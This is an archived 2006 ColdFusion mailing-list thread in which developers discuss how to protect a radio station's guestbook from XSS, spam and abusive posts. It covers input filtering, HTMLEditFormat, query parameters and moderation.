Here is a good example of the kind of determination people trying to prevent JS hacks (e.g. XSS) are facing:
http://namb.la/popular/tech.html On 8/8/06, Mike Kear <[EMAIL PROTECTED]> wrote: > I have a site where the guestbook is a constant problem for me. I've > tried persuading the radio station management that they really dont > want a guestbook but they see it as an important way to interact with > the listeners. > > We'll get a fan of a show saying how the host is wonderful - a dream - > 'a real spunk' then a whole tribe of others saying how ugly and > totally undesirable the host is. Never any middle ground. > > So I have to keep it going. > > It's a constant source of problems, from people at other stations or > fans of other stations trying to embarass us by putting links to porn > or telling out-and-out lies there. We get lots of spammers trying to > use our guestbook form to send their emails or post links to their > sites. > > Here are some of the things we do (and it's a changing feast - i'm > always tinkering with teh process page to tighten it up a little > without inhibiting the real listeners posting (which is why we havent > gone to useing Captcha yet). > > [A] no guestbook post goes straight to the site. It goes to an editor first > [B] any post containing the character < gets dumped. (early attempt to > filter out html) > [C] any post containing some reserved words gets dumped. > [D] Just in case <b> didnt catch it, all posts are HTMLEditFormated > [E] All posts go through <cfqueryparam on their way into the database > [F] Any posts not coming from the right page (ie having > cgi.http_referer with the correct value) get dumped. > [G] Ip address of every post are stored, and posts coming from some > ips and some domains are dumped. > > The poster doesn't always get notified that the post has been dumped - > I dont want to give too many clues to the abusers about what checks > are being made. There arent any foolproof safeguards but we keep on > working on it while trying to resist any measure that will make it > more difficult for legitimate listeners to post. > > It keeps managing that site interesting though! > > > Cheers > Mike Kear > Windsor, NSW, Australia > Adobe Certified Advanced ColdFusion Developer > AFP Webworks > http://afpwebworks.com > ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month > > > > > > > On 8/8/06, Dave Watts <[EMAIL PROTECTED]> wrote: > > > Do you have any scripts that you can share? > > > > Well, no, unfortunately. > > > > The reason for this is that there are various approaches that you can take > > to solve this problem, and these approaches are very dependent on what > > you're trying to accomplish - it's not a matter of just having a script that > > you can plug in. One solution, as Michael Dawson mentioned, is to use > > HTMLEditFormat to remove all HTML from input. This is pretty simple, and > > prevents many XSS attacks (though not necessarily all). But what if you want > > to allow people to input HTML in the first place? This is somewhat common in > > CMS environments, for example. This is why "languages" like BBML exist - to > > allow limited HTML authoring without allowing the author to submit HTML to > > the server. Even then, you have to watch out for things like JavaScript > > pseudo-URLs, which bypass any tag-based approach to removing XSS exploits. > > > > In addition, you may choose to differentiate between "safe" and "unsafe" > > strings, an approach recommended by Joel Spotsky in passing here: > > > > http://www.joelonsoftware.com/articles/Wrong.html > > > > Dave Watts, CTO, Fig Leaf Software > > http://www.figleaf.com/ > > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Introducing the Fusion Authority Quarterly Update. 80 pages of hard-hitting, up-to-date ColdFusion information by your peers, delivered to your door four times a year. http://www.fusionauthority.com/quarterly Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:249120 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
